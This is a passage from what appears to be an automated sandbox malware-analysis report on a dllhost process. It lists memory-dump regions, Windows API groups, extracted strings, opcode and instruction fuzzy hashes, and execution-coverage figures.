                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ConsoleMode
                                  • String ID:
                                  • API String ID: 4145635619-0
                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction ID: caea053fdd14f9712b47b2e6220ded45bc440f22397c61b796fae019fa436cbc
                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction Fuzzy Hash: 4B91CE32650651C9FB6ACF659450BEE2BA0FB6CF8CF444106DF5B73AA5DA38E486C300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction ID: 097bdb6190f555a5fdb081048b24676149338c4dbe283e7a2b1e06a1896c2bf3
                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction Fuzzy Hash: AA111536750F15CAFB00DB60E8947AA33A4F71DB58F440E21EB6D967A4DB78C1588340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction ID: 0bb19c70c590c3dfcc79a9db6fef0f6c56f456817b39f658926a32e8a66d37ba
                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction Fuzzy Hash: 38111836750B04CAFB01DF60E8547AA33A4F71DB58F440E21EF6E96BA4DB78D1988380
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction ID: 0d07e5c84707d22738f97a56b05cff87be6c8221fad0624e0712033ec8064ab4
                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction Fuzzy Hash: AE718F76290B93C1F63ADE669954BEB7794F389B88F400016DF0B63BA9DA75C5048740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction ID: a31da691b411d30905d786676d390117ca7db311804687b837258b35ad70883f
                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction Fuzzy Hash: 9F717F762C8B92C2F67ADE269854BEB6794F38DF88F440016DF0B63BA8DE35C5008740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 3242871069-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 2c9bbc8802d9159b98ee9def374c70320720cd75d9f40c6dd554d1d108dbdc8a
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: 0451D13B351A80CEFB56CB25E744FAC3399F368B88F15A169DA8647788D778C841C780
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CallTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3163161869-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: 0e060dc762f5e3f8775b1a04d57c94e3d1dc74353e12b05f0e37beb2ad9b6f5a
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: C0619037604BC4C9EB229B15E540BDEB7A4FB99B94F046259EBC807B99DB78C090CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction ID: af75e30e7e614401a4ec43e2df3ef741adbed1ec77e5819ec6d48bf23bf31e40
                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction Fuzzy Hash: 24510936284B82C1F62EEE25A454BEB7751F3ADF88F540225DF5B63BA9DA35C404C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction ID: d9f7eb43392b306edf32a056ad3027294a44d15c505acb2bc3725628eb6edf24
                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction Fuzzy Hash: F351A2362C8781C3F62ADA29A494BEB7661F7ADF88F540025DF5B63BA9DA35C404C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction ID: dfc14aad8214c9a8f38ab36e648d867354dd8c62520f10bc722b3d7eb3eede05
                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction Fuzzy Hash: E041AE32625B80C6EB65DF25E544BDBA7A4F38C788F804122EB4D97798EB78C445CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction ID: 8d5bd57d1eea467ecfeb950ad8b89cd0f463b33d7f7464b97194cdf31e3de368
                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction Fuzzy Hash: D241BF32625A80C6F725DF65E444BDAB7A0F7ACB88F844121EF4E97768EB78D441CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction ID: c52003565e5b47ad038ec3da5cea037b6df3463791391a9e581ee3c4cc9102ce
                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction Fuzzy Hash: 12111932218B85C2EB26DF15E54469AB7E5F788B98F584221EF8D17BA4DF38C551CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction ID: 5961cbf7a0f5123faccfa41641397832dee8dca8839ef5bd5435f19609288f20
                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction Fuzzy Hash: 8311EC32658B80C2FB66CF15E44469A77E5FB88F98F584225DB8E17B64DF38C551CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: ntdll.dll
                                  • API String ID: 1646373207-2227199552
                                  • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                  • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                  • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                  • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID:
                                  • API String ID: 756756679-0
                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction ID: 511ae7f1bfe6ac0eced33f1496e4733a0a59bb04f35d17ded6192c02331485db
                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction Fuzzy Hash: 1A115B31A41B91C5FA1ADB66A80869AA7B0F7CDFD4F584124DF4E63775EF38D4428300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID:
                                  • API String ID: 756756679-0
                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction ID: 409764778b63da25329ba2e67f453f64ed5c404d0a381d5246cfc22f21ec8a00
                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction Fuzzy Hash: 6F113931A85B80D5FA1ADB66A80869A67A0FBCDFD5F584124DF4F63775EE38D4428300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                  • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                  • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                  • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction ID: e40ef41b61536b98298d55cb467abd74c8a6d0409dce86de8114d1d976e9cb85
                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction Fuzzy Hash: 88E03931641615DAF719EB62D8087AAB6E1EB8DB09F848024CB0907790EF7DC4998740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction ID: 566bc1f2fa0b8e866033bc0e6a93b162eb2c6b11db4ccf9b18bfedb5aee947f1
                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction Fuzzy Hash: 4EE03931641604EAF719EB62D80878A3AE1EF8CF0AF448024CA0A07360EF7DD4998740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                  • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                  • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                  • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction ID: d16cbd50d49141ba57d7da013736c6ae9b88f64d8ad4af548ca726a0fdb94126
                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction Fuzzy Hash: E0E0ED71651615DAF719EB62D9087AAB6A1FB8DB19F848024CB0907750EE3C84999610
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction ID: 966dd0da08effb9f2da97d98c20cfe2ad8b377640ed9c19d1a34f79710ba0923
                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction Fuzzy Hash: 62E0ED71651504EAF719EB62D80479A7AA1FF8CF1AF448024CA0B07320EE3C94999610

                                  Execution Graph

                                  Execution Coverage:1.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
